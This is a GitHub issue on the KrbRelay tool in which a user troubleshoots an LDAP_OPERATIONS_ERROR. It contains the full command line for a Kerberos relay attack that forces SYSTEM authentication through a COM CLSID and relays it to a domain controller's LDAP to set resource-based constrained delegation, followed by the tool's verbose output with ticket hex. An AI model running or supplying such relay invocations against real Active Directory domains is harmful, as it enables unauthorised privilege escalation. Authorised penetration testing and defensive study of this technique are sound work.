cube0x0/KrbRelay

Help Wanted - ldap_modify: LDAP_OPERATIONS_ERROR

Opened this issue · 0 comments

fgomesz commented

Hello,

thank you for the tool.
Any ideas on why this is happening? I am assuming that I might not have write access in the LDAP. Is there a good way to verify this?

.\KrbRelay.exe -spn ldap/dc01.contoso.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-284291298-3657489341-3502550540-10634 -port 10
[] Relaying context: contoso.local \WINAUDIT$
[] Rewriting function table
[] Rewriting PEB
[] GetModuleFileName: System
[] Init com server
[] GetModuleFileName: C:\Users\sssss\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAD3dQpCB2pr40KDWEpSdF+VAtgAAKgX///75ckblajshiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[] Forcing SYSTEM authentication
[] Using CLSID: 90f18417-f0f1-484e-9d3c-59dceee5dbd8
[] apReq: 608206f006092a864886f71201020201006e8206df308206dba003020105a10302010ea20703050020000000a382050d6182050930820505a003020105a1101b0e414541544c414e5449434f2e5054a2243022a003020102a11b30191b046c6461701b116d672e616561746c616e7469636f2e7074a38204c4308204c0a003020112a103020106a28204b2048204aecb4959ffc5da0b0bffa456689698c921c0621cf49f7efc606f15f836f12ee5338e518b59d61d8f3bf0062a4f4c4b8a0755e732d8fefa677d9ac13828f5d2a2b6845e740b0605075741fd449d9010de4aabfde45b374af27d380fc75f9bb815d91f02b303c0e8128867d4ff29a20febb98fb0d4d5dbd54ff8733451cbb2ea9c12cd3da48233a7e92776c74268a94b97fbf0d5194f7956aef54b0480072f46ad535050d337d45bde7685ddd3a0c59496590d147a8ed94ee997a4fb32aab3b1283e97a5c253b1ea32a45daed0202e74d3752d5312f40a2b85f220580170b554889b2d7b695b6016fa035e98595eef20a1695b5a26503e09619f5ddc54e13e2d0b2425674613b0702cb5a1a43705668d64885d27d9f1a52de6374140da2e21dde38b159c6881a99f0e3bd4e1751646e190494af04c5952c5c202c3d21ba5ce98f60705e459f505b15dbc9390f13a1227970670ac871e98c2c3d5443a31a92dc686a46c99e7af605c7f260bc152f5c1edf27db1a7f6645f12b0b301fc655c1851e7d00a506929db990db00a6ca5bc4595d3f8ca449a11ca8574864ec0d8dd4c4217762df1d40429ef900d04022f84b4790e80bded6204d3b49f2830b558e32fdad7e1e9213f6e6a743bb012bb347fcd21121d28de10255650ecc03e8f67ac804485d961a38fa2f5663d473c9aecfb7b14f345f130803777db4d5a4e300c731ecb4502d898b71ea1f0fb13304fb31174d4126aef72778765754e0f745a07ef513f2fc47cb0b4f9ece2d47fbb0a8020b82f22e2ac30fa7780ba15228096ab7b645f48a310bf0ce4b199d40511be56c44b3f66983d4e4dabdea30456af3dd02b7d306b3e214f0c10c16a2de3b3f71876174dbb1dbe2fb686a352056d40c60e4e0bba1bbecf380b9eb9e73d1b2cfaeabbc6b27af8c06c1dd469920271449102e6fbee8771e74f7ad5e470feb14a5fccd03958bac3f242ff2ac921db19d3cf102daab810fb2322777e7df4b3a44ec093f3b8d1bd742d659d84533095230be8f2664c7d82248cec75423e1c19adb0825caf536d2dc3991a29ea42b2974102356cafc0acf5bbe59be2d9882a6ce23c358bc054f51d2d823e70cab476552696fd981d7286edd32536d56a87635c2b2a644ce12428585581edf2e8cb575e4c3ae8ae10e2d7a1456e164654f1e6794b6035e80a498ef060add0e56d2ad5c942a58f4fa013eecdead6ad594e38ed629073f660a4dab1b4b6bb571976ce533de075a70169e66890b95e9fccee78dccd4f7d55e0dbd673fee7220fdf3c081e880297ac5988f364874bce61102002dff83892bbd61576d8c71425ddab3d415c0c13ea675cf4c2f063f8881e54719b4a2f55392c8794d71b16aa75510c4acb3eecd91d8543c52289178ce968068315fdaf4728a997fa9d0807da8819f38670e6cce60a65d7dda1c3b7c268efecd4627e6258a10e6066fb1c199f6dfa60b4511dc348cfe39b8f5b6d765ae0deadff99a3745260d92a62c53d4434685e946805f2d66134539f311dae23412aeeecce095113fe858d3c0cdf45336e6c23ece97d5689bdf6aab8201ea6c58bc7a4b16ee98591c9daa238bbeed8582861afa7ddc577818f306d0a5e59caaa6cf5709f496c10f50805558616d70164613919b3ed3453af126d1a748b0fea3e31e9403862f3f99b3da8ae83dae68ca48201b3308201afa003020112a28201a6048201a23c787a60475df35964f1778c58eaaa2d0c6eb6bdbdf6254b38554ed62c2105f48f6b49cfadc1b32386194567054834c06b2c35e502db2e409abc8b5b45c80a8b964a9a9e1f2de281f764e16a70c0413edf7d7b0f391e4119a0f445e3fb808c84b326c98269dd8cb594de0b8063eee3d7b8d96e7f07245bbe3cc8fb60af54c54105b7d6c7a7b9a5be6974b27deeec0cee09f36602a10430b10fd362a365aae31e57a50ce4c06d7b20efde33b225b481139a113b2587ea5bdce3fe75b4c26ca0b922c1035614b0248be1f33758ff1cb0b77eaeb59365c854f8e34fd9ada3c41a0b1166a0e4f980d96aa17c74b556e51c959c32d8d228c562628a0965b7d1333a4de348adeb916548d6a898cc1d477542e0e4efb809f3e6bafefb49ac2e18312815e03baf261a82fa811ae7f7efb2c2eb2654033f9120a32390cb24a1de1001d8a75fbecf7b0bd3ed8ac543aa9b2c051dc18a6298a39fec530f29998ac17d9ff793c3c7640b7eb5bbc2593b270dea5c8ac323289f41567d36a686cd656204038c085caea19c39445cf06f8f2fe413685a852ea6f3dc19cef53d7a10eb59da6839e33e29
[] bind: 0
[] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e6cf3730db030876f6e2472891bbc992fcc4796ebbc28224978ad0145e929d0dc563141c04d1e290745a632b17bcab04c51d4bb1f9e0cb1c3dae1a921780b6f952ac161a1842d963fb3a3ebb3965aeb4493bbc593bc1bda8e5ea21da1f23e13d38ca5e1d938eca15dbc74b30c1e23
[] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection
[] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a2440442b8d2e1896d7d053a62a11fbf07f85443aef27316854370842150fcc4778d4072c9b9f00e01cc22192792e63703ea9a4db300e4a2ba9a5c80699e6d1f88efffcc66a1
[] bind: 0
[] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[] ldap_modify: LDAP_OPERATIONS_ERROR